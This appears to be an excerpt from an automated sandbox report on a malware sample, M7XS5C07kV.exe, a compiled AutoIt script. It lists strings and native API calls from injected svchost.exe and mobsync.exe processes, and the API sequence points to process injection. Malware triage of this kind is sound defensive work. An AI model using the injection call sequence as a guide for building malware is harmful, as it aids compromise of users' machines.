Source: M7XS5C07kV.exe, 00000000.00000000.1430546632.0000000000684000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_45729b92-0
Source: M7XS5C07kV.exe, 00000000.00000000.1430546632.0000000000684000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_2fe0c3ab-3
Source: M7XS5C07kV.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_c243c736-e
Source: M7XS5C07kV.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_5437a974-1

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042C483 NtClose,	2_2_0042C483
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872B60 NtClose,LdrInitializeThunk,	2_2_03872B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03872DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038735C0 NtCreateMutant,LdrInitializeThunk,	2_2_038735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03874340 NtSetContextThread,	2_2_03874340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03874650 NtSuspendThread,	2_2_03874650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872B80 NtQueryInformationFile,	2_2_03872B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872BA0 NtEnumerateValueKey,	2_2_03872BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872BE0 NtQueryValueKey,	2_2_03872BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872BF0 NtAllocateVirtualMemory,	2_2_03872BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872AB0 NtWaitForSingleObject,	2_2_03872AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872AD0 NtReadFile,	2_2_03872AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872AF0 NtWriteFile,	2_2_03872AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872F90 NtProtectVirtualMemory,	2_2_03872F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872FA0 NtQuerySection,	2_2_03872FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872FB0 NtResumeThread,	2_2_03872FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872FE0 NtCreateFile,	2_2_03872FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872F30 NtCreateSection,	2_2_03872F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872F60 NtCreateProcessEx,	2_2_03872F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872E80 NtReadVirtualMemory,	2_2_03872E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872EA0 NtAdjustPrivilegesToken,	2_2_03872EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872EE0 NtQueueApcThread,	2_2_03872EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872E30 NtWriteVirtualMemory,	2_2_03872E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872DB0 NtEnumerateKey,	2_2_03872DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872DD0 NtDelayExecution,	2_2_03872DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872D00 NtSetInformationFile,	2_2_03872D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872D10 NtMapViewOfSection,	2_2_03872D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872D30 NtUnmapViewOfSection,	2_2_03872D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872CA0 NtQueryInformationToken,	2_2_03872CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872CC0 NtQueryVirtualMemory,	2_2_03872CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872CF0 NtOpenProcess,	2_2_03872CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872C00 NtQueryInformationProcess,	2_2_03872C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872C60 NtCreateKey,	2_2_03872C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872C70 NtFreeVirtualMemory,	2_2_03872C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873090 NtSetValueKey,	2_2_03873090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873010 NtOpenDirectoryObject,	2_2_03873010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038739B0 NtGetContextThread,	2_2_038739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873D10 NtOpenProcessToken,	2_2_03873D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873D70 NtOpenThread,	2_2_03873D70
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04424650 NtSuspendThread,LdrInitializeThunk,	5_2_04424650
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04424340 NtSetContextThread,LdrInitializeThunk,	5_2_04424340
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422C60 NtCreateKey,LdrInitializeThunk,	5_2_04422C60
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_04422C70
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_04422CA0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_04422D10
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_04422D30
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422DD0 NtDelayExecution,LdrInitializeThunk,	5_2_04422DD0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_04422DF0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422EE0 NtQueueApcThread,LdrInitializeThunk,	5_2_04422EE0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422F30 NtCreateSection,LdrInitializeThunk,	5_2_04422F30
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422FE0 NtCreateFile,LdrInitializeThunk,	5_2_04422FE0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422FB0 NtResumeThread,LdrInitializeThunk,	5_2_04422FB0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422AD0 NtReadFile,LdrInitializeThunk,	5_2_04422AD0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422AF0 NtWriteFile,LdrInitializeThunk,	5_2_04422AF0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422B60 NtClose,LdrInitializeThunk,	5_2_04422B60
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044235C0 NtCreateMutant,LdrInitializeThunk,	5_2_044235C0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044239B0 NtGetContextThread,LdrInitializeThunk,	5_2_044239B0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422C00 NtQueryInformationProcess,	5_2_04422C00
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422CC0 NtQueryVirtualMemory,	5_2_04422CC0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422CF0 NtOpenProcess,	5_2_04422CF0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422D00 NtSetInformationFile,	5_2_04422D00
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422DB0 NtEnumerateKey,	5_2_04422DB0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422E30 NtWriteVirtualMemory,	5_2_04422E30
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422E80 NtReadVirtualMemory,	5_2_04422E80
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422EA0 NtAdjustPrivilegesToken,	5_2_04422EA0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422F60 NtCreateProcessEx,	5_2_04422F60
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422F90 NtProtectVirtualMemory,	5_2_04422F90
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422FA0 NtQuerySection,	5_2_04422FA0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422AB0 NtWaitForSingleObject,	5_2_04422AB0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422BE0 NtQueryValueKey,	5_2_04422BE0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422BF0 NtAllocateVirtualMemory,	5_2_04422BF0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422B80 NtQueryInformationFile,	5_2_04422B80
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04422BA0 NtEnumerateValueKey,	5_2_04422BA0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04423010 NtOpenDirectoryObject,	5_2_04423010
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04423090 NtSetValueKey,	5_2_04423090
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04423D70 NtOpenThread,	5_2_04423D70
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04423D10 NtOpenProcessToken,	5_2_04423D10
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_00429100 NtCreateFile,	5_2_00429100
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_00429270 NtReadFile,	5_2_00429270
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_00429370 NtDeleteFile,	5_2_00429370
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_00429410 NtClose,	5_2_00429410

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_0063A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_0063A1EF

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_00628310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00628310

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_006351BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_006351BD

Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005DE6A0	0_2_005DE6A0
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005FD975	0_2_005FD975
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005DFCE0	0_2_005DFCE0
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005F21C5	0_2_005F21C5
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_006062D2	0_2_006062D2
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_006503DA	0_2_006503DA
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_0060242E	0_2_0060242E
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005F25FA	0_2_005F25FA
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_0062E616	0_2_0062E616
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005E66E1	0_2_005E66E1
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_0060878F	0_2_0060878F
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_00606844	0_2_00606844
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_00650857	0_2_00650857
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005E8808	0_2_005E8808
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_00638889	0_2_00638889
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005FCB21	0_2_005FCB21
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_00606DB6	0_2_00606DB6
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005E6F9E	0_2_005E6F9E
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005E3030	0_2_005E3030
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005FF1D9	0_2_005FF1D9
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005F3187	0_2_005F3187
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005D1287	0_2_005D1287
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005F1484	0_2_005F1484
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005E5520	0_2_005E5520
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005F7696	0_2_005F7696
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005E5760	0_2_005E5760
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005F1978	0_2_005F1978
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_00609AB5	0_2_00609AB5
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_00657DDB	0_2_00657DDB
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005F1D90	0_2_005F1D90
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005FBDA6	0_2_005FBDA6
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005DDF00	0_2_005DDF00
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005E3FE0	0_2_005E3FE0
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_00F26660	0_2_00F26660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004183B3	2_2_004183B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402929	2_2_00402929
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402930	2_2_00402930
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401200	2_2_00401200
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042EAA3	2_2_0042EAA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FBF3	2_2_0040FBF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402DF0	2_2_00402DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DDF3	2_2_0040DDF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402590	2_2_00402590
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004165B3	2_2_004165B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FE13	2_2_0040FE13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DF43	2_2_0040DF43
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DF37	2_2_0040DF37
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039003E6	2_2_039003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA352	2_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C02C0	2_2_038C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F41A2	2_2_038F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039001AA	2_2_039001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F81CC	2_2_038F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830100	2_2_03830100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C8158	2_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383C7C0	2_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864750	2_2_03864750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385C6E0	2_2_0385C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03900591	2_2_03900591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EE4F6	2_2_038EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4420	2_2_038E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F2446	2_2_038F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F6BD7	2_2_038F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FAB40	2_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390A9A6	2_2_0390A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038268B8	2_2_038268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E8F0	2_2_0386E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384A840	2_2_0384A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03842840	2_2_03842840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BEFA0	2_2_038BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832FC8	2_2_03832FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384CFE0	2_2_0384CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03882F28	2_2_03882F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860F30	2_2_03860F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E2F30	2_2_038E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4F40	2_2_038B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852E90	2_2_03852E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FCE93	2_2_038FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FEEDB	2_2_038FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FEE26	2_2_038FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840E59	2_2_03840E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03858DBF	2_2_03858DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383ADE0	2_2_0383ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384AD00	2_2_0384AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DCD1F	2_2_038DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0CB5	2_2_038E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830CF2	2_2_03830CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840C00	2_2_03840C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0388739A	2_2_0388739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F132D	2_2_038F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382D34C	2_2_0382D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038452A0	2_2_038452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385B2C0	2_2_0385B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E12ED	2_2_038E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384B1B0	2_2_0384B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387516C	2_2_0387516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382F172	2_2_0382F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390B16B	2_2_0390B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EF0CC	2_2_038EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038470C0	2_2_038470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F70E9	2_2_038F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FF0E0	2_2_038FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FF7B0	2_2_038FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F16CC	2_2_038F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03885630	2_2_03885630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DD5B0	2_2_038DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039095C3	2_2_039095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F7571	2_2_038F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FF43F	2_2_038FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03831460	2_2_03831460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385FB80	2_2_0385FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B5BF0	2_2_038B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387DBF9	2_2_0387DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFB76	2_2_038FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DDAAC	2_2_038DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03885AA0	2_2_03885AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E1AA3	2_2_038E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EDAC6	2_2_038EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFA49	2_2_038FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F7A46	2_2_038F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B3A6C	2_2_038B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D5910	2_2_038D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03849950	2_2_03849950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385B950	2_2_0385B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038438E0	2_2_038438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AD800	2_2_038AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03841F92	2_2_03841F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFFB1	2_2_038FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03803FD2	2_2_03803FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03803FD5	2_2_03803FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFF09	2_2_038FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03849EB0	2_2_03849EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385FDC0	2_2_0385FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03843D40	2_2_03843D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F1D5A	2_2_038F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F7D73	2_2_038F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFCF2	2_2_038FFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B9C32	2_2_038B9C32
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044A2446	5_2_044A2446
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04494420	5_2_04494420
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0449E4F6	5_2_0449E4F6
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043F0535	5_2_043F0535
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044B0591	5_2_044B0591
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0440C6E0	5_2_0440C6E0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04414750	5_2_04414750
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043F0770	5_2_043F0770
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043EC7C0	5_2_043EC7C0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04482000	5_2_04482000
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04478158	5_2_04478158
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043E0100	5_2_043E0100
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0448A118	5_2_0448A118
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044A81CC	5_2_044A81CC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044B01AA	5_2_044B01AA
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044A41A2	5_2_044A41A2
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04490274	5_2_04490274
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044702C0	5_2_044702C0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044AA352	5_2_044AA352
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044B03E6	5_2_044B03E6
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043FE3F0	5_2_043FE3F0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043F0C00	5_2_043F0C00
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043E0CF2	5_2_043E0CF2
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04490CB5	5_2_04490CB5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043FAD00	5_2_043FAD00
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0448CD1F	5_2_0448CD1F
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043EADE0	5_2_043EADE0
